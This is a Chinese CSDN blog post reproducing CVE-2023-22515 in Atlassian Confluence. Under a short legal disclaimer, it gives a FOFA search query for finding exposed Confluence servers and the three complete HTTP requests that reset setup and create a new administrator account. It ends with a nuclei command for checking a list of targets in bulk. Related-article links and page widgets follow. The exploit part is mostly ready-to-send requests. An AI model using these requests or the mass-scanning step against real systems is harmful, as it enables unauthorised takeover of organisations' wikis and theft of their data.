漏洞复现--Confluence未授权管理用户添加 (CVE-2023-22515)

已于 2023-10-16 20:02:27 修改
阅读量1.7k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: web安全 网络安全 安全
于 2023-10-16 20:00:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/133868104
版权

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负

一:漏洞描述

Atlassian Confluence是企业广泛使用的wiki系统。
2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。

二:漏洞影响版本

version>8.0.0

三:网络空间测绘查询

fofa:
app="ATLASSIAN-Confluence"
image.png

四:漏洞复现

POC:
先覆盖目标Confluence服务器中的bootstrapStatusProvider.applicationConfig.setupComplete属性:

GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: IP:PORT
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Connection: close
Cache-Control: max-age=0

然后新建管理员账户:

POST /setup/setupadministrator.action HTTP/1.1
Host: IP:PORT
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
X-Atlassian-Token: no-check

username=tbssec&fullName=tbssec&email=admin%40tbssec.com&password=tbssec&confirm=tbssec&setup-next-button=Next

接着完成安装请求:

POST /setup/finishsetup.action HTTP/1.1
Host: IP:PORT
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
X-Atlassian-Token: no-check

image.png
image.png
image.png
image.png
此时用户已经创建完毕,登录
image.png

五:批量验证

nuclei已上线该yaml (CVE-2023-22515)
.\nuclei.exe -t /http/cves/2023/CVE-2023-22515.yaml -l .\Confluence.txt -stats
image.png

芝士土包鼠
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2023-22515:Atlassian Confluence权限提升漏洞 [附POC]
薛定谔嘚喵博客
11-24 1019
Atlassian Confluence Data Center 和 Confluence Server 存在权限提升漏洞,该漏洞由属性覆盖导致,经身份验证的远程攻击者可以重新执行 Confluence 安装流程并增加管理员账户,从而访问 Confluence 实例。
docker-atlassian-confluence:打包在Docker映像中的Atlassian Confluence
02-16
Docker容器中的Atlassian Confluence 这是Atlassian Confluence与Docker的容器化安装,是我们所有人都喜欢的天堂。 该映像的目的是使安装尽可能简单,但要保留一些与Docker相关的变化。 您可以通过单击下面的相应链接并阅读文档来开始使用。 如果您想提供帮助,可以在下方查看“贡献”部分。 我在快车道上! 让我开始 要快速开始运行Confluence实例,请使用以下命令: docker run --detach --publish 8090:8090 cptactionhank/atlassian-confluence:latest 然后只需将您喜欢的浏览器导航到http://[dockerhost]:8090并完成配置。 配置 您可以通过提供以下环境变量来配置少量内容 环境变量 描述 X_PROXY_NAME 设置Tomcat连接器Pro
gas-calendar-confluence-note-builder:根据Google日历事件从模板创建Confluence会议笔记
04-13
初始设置 运行clasp login以设置您的Google凭据 创建从项目clasp在你的使用clasp create {project-name-that-you-pick 。 适当地更新defineUserProperties函数中的以下值: CONFLUENCE_API_BASE_URL-实例的Confluence API的基本URL,例如https://yourcompany.atlassian.net/wiki/rest/api CONFLUENCE_API_USER-要通过Confluence API进行身份验证的用户,例如[email protected] CONFLUENCE_API_TOKEN-在创建的令牌,例如123918yhf2jfga238fa2 CONFLUENCE_TEMPLATE_ID-用于会议笔记的模板的ID CONFLUENCE_PARENT_PA
confluence-html-to-md:Confluence 导出 html 到 Markdown 转换器
06-25
Confluence 导出 html 到 Markdown 转换器 安装 npm i -g princed/confluence-html-to-md 用法 在包含从 Confluence 导出confluence-html-to-md文件夹中运行confluence-html-to-md 。
tap-confluence:Confluence Content REST API的歌手水龙头
03-13
抽头汇合 Confluence REST API的歌手点击。 使用开发。 路线图 内容 空间 主题 团体 用户数 配置 使用JSON tap-confluence --config config.json config.json在哪里 { " base_url " : " https://your-domain.atlassian.net/wiki/rest/api " , " email " : " <your> " , " api_token " : " <your> " , " user_agent " : " MyDataIntegrationApp/1.0.0 Singer.io Tap for Confluence " } 使用环境变量 它们可以与JSON配置一起使用
漏洞分析|Atlassian Confluence Data Center & Server 存在访问控制缺陷漏洞 (CVE-2023-22515)
xuandaoren的博客
10-12 1102
Confluence 提供了一个集中式的团队协作环境,使团队成员能够共享文档、项目计划、任务列表、会议记录等信息,并进行实时协作和交流。Confluence Data Center 支持集群部署,可以在多个服务器上进行负载均衡,提高系统的容错性和性能。我们可以在下面看到,SetupCheckInterceptor将进行测试BootstrapUtils.getBootstrapManager().isSetupComplete()作为检查的一部分,以确定 Confluence 服务器是否已设置。
Atlassian 紧急修已遭利用的 Confluence 0day
smellycat000的专栏
10-09 396
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士澳大利亚软件公司 Atlassian 紧急修了位于 Cofluence Data Center and Server 软件中的一个严重的已遭利用的 0day 漏洞CVE-2023-22515,其CVSS评分为满分10分。该公司提到,“从一些客户处获知,外部攻击者可能已经利用了位于可公开访问呢的 Confluence Data Center an...
Confluence授权管理用户添加漏洞 (CVE-2023-22515)
holyxp的博客
11-02 735
Atlassian Confluence是企业广泛使用的wiki系统。 2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。
confluence的几个高危漏洞
fly夏天的博客
12-06 3617
CVE-2021-26084 CVE-2022-26134 漏洞
Confluence 授权漏洞分析(CVE-2023-22515)
hackzkaq的博客
11-28 278
在处理完上述工作后,Struts2 就会调用拦截器链中的拦截器,这些拦截器会根据用户请求参数值去更新 ValueStack 对象顶层节点的相应属性的值,最后会传到 Action 对象,并将 ValueStack 对象中的属性值,赋给 Action 类的相应属性。总的来说, 因为 方法的一些逻辑问题, 导致这个类自身对传入参数的过滤并没有生效, 我们最终还是可以通过 的形式去调用当前 action 的 getter / setter, 并不需要关心方法本身或者它的 returnType 是否使用了 注解。
confluence-python-lib:包装Confluence REST API的python库
02-05
confluence-python-lib:包装Confluence REST API的python库
浅析 Apache Confluence [CVE-2023-22515]
milu_Sec的博客
12-31 974
我们已经看到,此漏洞的根本原因是攻击者能够在经身份验证的端点的 Action 对象上执行杂的 getter/setter 方法,从而允许修改关键属性。同时欢迎各位同仁关注麋鹿安全,我们的文章会第一时间发布在公众号平台,如果不想错过我们新鲜出炉的好文,那就请扫码关注我们的公众号!希望各位读者看完我们的文章以后自己去实践一下,只有学到脑子里的东西才是自己的,如果遇到困难,可以加本人微信(i_still_be_milu)与麋鹿师傅一起探讨,炼心之路,就在脚下,我们一起成长。
Atlassian Confluence 身份认证绕过CVE-2023-22518/22515
2301_80115097的博客
11-14 255
总得来说这漏洞是一个自爆式百分百损失的漏洞,你假如想用,那么就拿不到服务器那边原来的数据,而我们打Confluence的站一般都是去看他的文库数据,而不是获取这个站点的shell,这是一种比较极端的利用方式,不太建议使用,除非已知文库没啥东西,就是想要这个shell。免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等应急响应笔记学习路线。
研究员在3个微软签名的引导程序中发UEFI安全引导绕过漏洞
smellycat000的专栏
08-15 319
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成为当今社会的根本性、基础性问题。随着软件产业的快速发展,软件供应链也越发杂多元,杂的软件供应链会引入一系列的安全问题,导致信息系统的整体安全防护难度越来越大。近年来,针对软件供应链的安全攻击事件一直呈快速增长...
CVE-2022-26134】Confluence OGNL RCE 漏洞
weixin_45742777的博客
09-09 7466
CVE-2022-26134】Confluence OGNL RCE 漏洞
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134)漏洞
网安君的博客
06-07 2651
本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。CVE-2022-26134的漏洞是一个严重的经身份验证的远程代码执行漏洞,通过 OGNL 注入利用并影响 1.3.0 版之后的所有 Atlassian Confluence 和 Data Center 2016 服务器。成功利用允许经身份验证的远程攻击者创建新的管理员帐户、执行命令并最终接管服务器。1.3.0 ..
漏洞】Atlassian Confluence(CVE-2022-26134)OGNL远程代码执行
做自己喜欢的事,并将其发挥到极致!
06-06 1972
本篇文章所涉及技术与工具仅用于技术研究、漏洞,切勿用于非法渗透攻击行为,造成任何后果与本作者无关,切记!!!Atlassian Confluence 是一款各企业广泛使用的 wiki 系统。在上存在OGNL 注入漏洞,恶意攻击者可以利用该漏洞在目标Atlassian Confluence Server and Data Center服务器上注入恶意ONGL表达式 ,造成远程代码执行。......
CVE漏洞-CVE-2023-38831 WinRAR代码执行漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
10-27 837
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。从5.60版开始,WinRAR启用了新的图标,但用户仍可以通过官网提供的主题包换回原版风格的图标。
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134)
weixin_42489549的博客
06-29 7935
CVE-2022-26134 Confluence远程命令执行漏洞
docker-compose jira confluence
最新发布
01-10
Docker-compose是一个用于定义和运行多个容器应用的工具,能够简化容器化应用的部署与管理过程。而Jira和Confluence是Atlassian公司开发的两个知名的协同办公工具。 Jira是一个专业的项目管理工具,可以帮助团队进行需求管理、任务分配、缺陷跟踪等工作。使用Docker-compose可以方便地部署Jira容器,并配置所需的环境参数,例如数据库连接、内存分配等。通过定义相关的容器服务,可以实快速搭建和管理Jira应用,减少了环境配置和部署的工作量。 Confluence是一个企业知识管理平台,可以用于团队和组织的文档协作、知识共享、项目文档等。与Jira类似,使用Docker-compose可以轻松地配置和部署Confluence容器,并设置相关的容器服务。通过这种方式,可以快速创建和管理Confluence应用,提高了协同办公的效率。 使用Docker-compose来部署Jira和Confluence有以下几个优点: 1. 声明式配置:通过Docker-compose的YAML文件,可以清晰地定义Jira和Confluence的各种配置项,使部署过程更加可控和可重。 2. 快速部署和扩展:Docker-compose可以同时启动多个容器实例,可以根据实际需求轻松扩容和缩容。这样可以在需要时快速部署新的Jira和Confluence实例,提高应用的可用性和性能。 3. 环境隔离:Docker容器提供了强大的隔离性,每个应用实例都运行在独立的容器内。这样可以避免应用之间的相互影响,增强了应用的稳定性和安全性。 总之,通过使用Docker-compose来部署Jira和Confluence,可以简化应用的部署和管理,提高开发和协同办公的效率,并且具备良好的可扩展性和隔离性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值